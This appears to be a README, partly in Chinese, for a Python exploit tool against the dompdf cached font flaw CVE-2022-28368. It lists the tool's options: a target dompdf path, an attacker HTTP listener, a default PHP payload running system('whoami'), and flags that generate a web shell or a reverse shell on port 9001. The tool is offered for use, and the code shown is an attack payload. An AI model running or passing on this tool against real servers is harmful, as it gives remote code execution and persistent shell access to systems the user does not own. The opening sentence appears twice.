
这个仓库包含一个Python脚本,它将处理dompdf缓存字体漏洞(CVE-2022-28368)的大部分工作,你只需要创建请求即可。
本仓库包含一个 Python 脚本,用于处理 dompdf 缓存字体漏洞(CVE-2022-28368)的大部分工作,你只需创建请求即可。它甚至还会提供一个触发字符串来启动漏洞利用 :)
usage: CVE-2022-28368.py [-h] -d DOMPDF_LOCATION [-f FONTNAME] -i HTTP_IP [-p HTTP_PORT] [-P PHP] [-w] [-r]
This script handles the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request
optional arguments:
-h, --help 显示此帮助信息并退出
-d DOMPDF_LOCATION, --dompdf-location DOMPDF_LOCATION
目标 Web 服务器上的 dompdf 路径(示例:http://target.com/vendor/dompdf)
-f FONTNAME, --fontname FONTNAME
利用字体名称(默认:expfont.php)
-i HTTP_IP, --http-ip HTTP_IP
HTTP 监听 IP
-p HTTP_PORT, --http-port HTTP_PORT
HTTP 监听端口(默认:80)
-P PHP, --php PHP 要执行的 PHP(默认:<?php system("whoami"); ?>)
-w, --webshell 生成 Web Shell
-r, --revshell 生成反弹 Shell(默认使用 HTTP 监听 IP 和端口 9001)
https://positive.security/blog/dompdf-rce https://github.com/positive-security/dompdf-rce